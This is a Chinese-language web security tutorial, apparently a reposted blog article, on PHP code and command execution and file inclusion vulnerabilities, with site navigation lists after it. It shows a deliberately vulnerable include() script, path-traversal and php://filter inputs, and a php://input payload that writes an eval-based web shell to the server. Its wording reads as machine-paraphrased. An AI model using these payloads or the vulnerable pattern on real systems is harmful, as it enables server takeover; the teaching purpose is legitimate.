三十:RCE代码及命令执行漏洞全解
摘要:在WEB应用中有时候程序员为了考虑灵活性,简明性,会在代码调用或者命令执行函数去处理。好比当应用在调用一些能将字符串转换为代码的函数时,没有考虑用户是都能控制这个字符串,将形成代码执行漏洞。一样调用系统命令处理,将形成命令执行漏洞
php
函数eval:
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 若是没有在代码字符串中调用 return 语句,则返回 NULL。若是代码中存在解析错误,则 eval() 函数返回 false。
函数system:
system — 执行外部程序,而且显示输出 $code=$_GET['x']; echo system($code) //x=ipconfig x=ver
漏洞造成条件:
可控变量,以及漏洞函数 无拓展功能,通常没有此类函数
文件包含漏洞:
本地文件包含和远程文件包含漏洞,本身的服务器容许别人的php代码,实现远程文件包含
index.php
<?php
$file = $_GET['file'];
if(isset($file)){
include("$file");
// require();
// require_once();
// include_once();
}else{
echo "file fail";
}
?> 同文件目录下存在其余文件会读取,目录下存在index.php,默认访问index.php,127.0.0.1/include/?file=dudu.php
../../etc/httpd.conf 本地包含漏洞能够读取其余文件 172.0.0.1/uploads/include.php?file=图片马的地址
有文件包含,直接上传,或者日志进行上传。蚁剑连马时候,连得是目标马的地址
○ PHP中形成文件包含的四个函数
一、include(),require()
当使用include()函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 当使用require()函数包含文件时,只要程序一执行就会当即调用文件,发生错误的时候会输出错误信息,而且终止脚本的运行。
2.include_once()和include()功能相同,区别在当重复调用同一文件时。程序只调用一次
require_once()功能和require()相同,区别在于当重复调用同一文件时,程序只调用一次。 当上述的四个函数包含一个新文件时,该文件将做为PHP代码执行,php内核并不在乎该被包含的文件是什么类型,若是被包含的是txt文件,图片文件,远程URL,也都将做为PHP代码执行
○ 本地文件包含,远程文件包含的区别
一、本地文件包含LFI(local File Include)
2.远程文件包含RFI(Remote File Include)须要ini中allow_url_include = on,allow_url_fopen = on
PHP伪协议
事实就是支持的协议和封装的协议12种
file:// - 访问本地文件系统
http:// - 访问http网站
ftp:// - 访问FTP(s)URLS
php:// - 访问各个输入输出流
zlib:// - 压缩流
data:// - 数据(RFC 2397)
glob:// -查找匹配的文件路径模型
ssh2:// - Secure Shell 2
rar:// - RAR
ogg:// - 音频流
expect:// - 处理交互式的流
目标文件 robots.txt 路径为127.0.0.1/www/robots.txt <?php phpinfo();?>
robots.zip 127.0.0.1/www/robots.zip robots.txt
1.php 127.0.0.1/www/1.php <?php echo('Hello world')?>
flag.txt D:/flag.txt flag{123test}
经常使用协议:
1.目录遍历获取flag:
2.php://input php://filter (1) php://input用于执行php代码
也能够写入shell获取服务器权限
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[CMD])?>');?>
(2)php://filter 用于读取源码 ?file=php://filter/convert.base64-encode/resource=1.php
3.file:// 用于读取本地系统文件,在CTF中读取本地文件
4.data:// 能够写入后门,获取权限执行任意命令
5.zip:// zip://[压缩文件的绝对路径]#[压缩文件的子文件名]
6.phar协议的做用是归档,将多个文件分组为一个文件。能够处理tar和zip文件
相关文章
- 1. 命令执行、代码执行漏洞
- 2. Pikachu-RCE(远程命令/代码执行漏洞)
- 3. RCE远程命令、代码执行漏洞
- 4. 初学RCE(远程命令/代码执行漏洞)
- 5. 远程命令、代码执行RCE漏洞
- 6. 命令执行及代码执行漏洞
- 7. 远程命令执行漏洞与远程代码执行漏洞33333
- 8. 命令执行和代码执行漏洞
- 9. WEB安全-命令执行漏洞
- 10. Web安全-命令执行漏洞
- 更多相关文章...
- • C# 不安全代码 - C#教程
- • Docker 命令大全 - Docker教程
- • Docker 清理命令
- • Flink 数据传输及反压详解
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 「插件」Runner更新Pro版,帮助设计师远离996
- 2. 错误 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
- 3. Jenkins 2018 报告速览,Kubernetes使用率跃升235%!
- 4. TVI-Android技术篇之注解Annotation
- 5. android studio启动项目
- 6. Android的ADIL
- 7. Android卡顿的检测及优化方法汇总(线下+线上)
- 8. 登录注册的业务逻辑流程梳理
- 9. NDK(1)创建自己的C/C++文件
- 10. 小菜的系统框架界面设计-你的评估是我的决策
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 命令执行、代码执行漏洞
- 2. Pikachu-RCE(远程命令/代码执行漏洞)
- 3. RCE远程命令、代码执行漏洞
- 4. 初学RCE(远程命令/代码执行漏洞)
- 5. 远程命令、代码执行RCE漏洞
- 6. 命令执行及代码执行漏洞
- 7. 远程命令执行漏洞与远程代码执行漏洞33333
- 8. 命令执行和代码执行漏洞
- 9. WEB安全-命令执行漏洞
- 10. Web安全-命令执行漏洞